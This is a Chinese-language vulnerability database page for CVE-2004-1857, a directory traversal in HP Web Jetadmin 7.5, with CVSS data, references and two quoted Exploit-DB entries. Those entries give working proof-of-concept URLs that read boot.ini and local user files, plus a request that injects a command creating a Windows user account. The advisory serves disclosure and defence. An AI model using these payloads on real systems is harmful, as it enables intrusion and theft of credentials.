CVE-2004-1857
CVSS2.1
发布时间 :2004-03-24 00:00:00
修订时间 :2016-10-17 23:01:48
NMCOE    

[原文]Directory traversal vulnerability in setinfo.hts in HP Web Jetadmin 7.5.2546 allows remote authenticated attackers to read arbitrary files via a .. (dot dot) in the setinclude parameter.


[CNNVD]HP Web Jetadmin setinfo.hts脚本目录遍历漏洞(CNNVD-200403-105)

        
        HP Web JetAdmin具有一个整合式的修改的Apache Web服务器。
        HP Web Jetadmin包含的setinfo.hts对用户提交的URI参数缺少充分过滤,远程攻击者可以利用这个脚本以WEB权限查看任意文件内容。
        setinfo.hts脚本对用户提交给'include'的参数缺少充分过滤,提交包含多个'../'字符的URI参数,可绕过WEB ROOT限制,一个验证用户可以WEB权限读取系统文件内容。
        

- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1857
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1857
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200403-105
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=108016019623003&w=2
(UNKNOWN)  BUGTRAQ  20040324 HP Web JetAdmin vulnerabilities.
http://www.securityfocus.com/advisories/6492
(VENDOR_ADVISORY)  HP  SSRT4700
http://www.securityfocus.com/bid/9972
(VENDOR_ADVISORY)  BID  9972
http://xforce.iss.net/xforce/xfdb/15606
(VENDOR_ADVISORY)  XF  hp-jetadmin-setinfo-directory-traversal(15606)

- 漏洞信息

HP Web Jetadmin setinfo.hts脚本目录遍历漏洞
低危 输入验证
2004-03-24 00:00:00 2005-10-20 00:00:00
远程  
        
        HP Web JetAdmin具有一个整合式的修改的Apache Web服务器。
        HP Web Jetadmin包含的setinfo.hts对用户提交的URI参数缺少充分过滤,远程攻击者可以利用这个脚本以WEB权限查看任意文件内容。
        setinfo.hts脚本对用户提交给'include'的参数缺少充分过滤,提交包含多个'../'字符的URI参数,可绕过WEB ROOT限制,一个验证用户可以WEB权限读取系统文件内容。
        

- 公告与补丁

        厂商补丁:
        HP
        --
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://h10010.www1.hp.com/wwpc-JAVA/offweb/vac/us/en/en/network_software/wja_overview.html

- 漏洞信息 (23879)

HP Web Jetadmin 7.5.2456 setinfo.hts Script Directory Traversal Vulnerability (EDBID:23879)
windows remote
2004-03-24 Verified
0 wirepair
N/A [点击下载]
source: http://www.securityfocus.com/bid/9972/info

It has been reported that HP Web JetAdmin may be prone to a directory traversal vulnerability allowing remote attackers to access information outside the server root directory. The problem exists due to insufficient sanitization of user-supplied data passed via the 'setinclude' parameter of 'setinfo.hts' script.

This vulnerability can be combined with HP Web Jetadmin Firmware Update Script Arbitrary File Upload Weakness (BID 9971) to upload malicious files to a vulnerable server in order to gain unauthorized access to a host. 

This issue has been tested with an authenticated account on HP Web Jetadmin version 7.5.2546 running on a Windows platform.

https://www.example.com:8443/plugins/hpjdwm/script/test/setinfo.hts?setinclude=../../../../../../../boot.ini
https://www.example.com:8443/plugins/hpjdwm/script/test/setinfo.hts?setinclude=../../../../../auth/local.users
https://www.example.com:8443/plugins/hpjdwm/script/test/setinfo.hts?setinclude=../../../hpjwja/firmware/printer/test.inc		

- 漏洞信息 (23880)

HP Web Jetadmin 7.5.2456 Remote Arbitrary Command Execution Vulnerability (EDBID:23880)
windows remote
2004-03-24 Verified
0 wirepair
N/A [点击下载]
source: http://www.securityfocus.com/bid/9973/info

Reportedly HP web Jetadmin is prone to a remote arbitrary command execution vulnerability. This issue is due to a failure of the application to properly validate and sanitize user supplied input.

Successful exploitation of this issue will allow a malicious user to execute arbitrary commands on the affected system.

This issue has been tested with an authenticated account on HP Web Jetadmin version 7.5.2546 running on a Windows platform.

/plugins/hpjfpmui/script/wja_update_product.hts:
(Changed the value of obj to our DoS function)
<FORM onsubmit="return VerifyUpload(this)" action=wja_update_product.hts
method=post encType=multipart/form-data>
<INPUT type=hidden value=[[httpd:RemoveCacheFiles($dir$)]] name=obj> <INPUT
type=hidden value=true name=__save>
<INPUT type=hidden value=0 name=packageCount> <INPUT type=hidden value=blah.fpm name=goodFilename>

The following proof of concept that will create a user account has been provided by H D Moore <sflist@digitaloffense.net>:

https://<target>:8443/plugins/framework/script/tree.xms?obj=httpd:WriteToFile([$__installdir$]conf/portlisten.conf,Listen%208000%0A%0DAccessLog%20"|../../../../../../winnt/system32/cmd.exe%20/c%20net%20user%20P%20P%20/ADD")		

- 漏洞信息

4559
HP Web JetAdmin setinfo.hts setinclude Parameter Traversal Arbitrary Command Execution

- 漏洞描述

- 时间线

2004-03-25 Unknow
Unknow Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站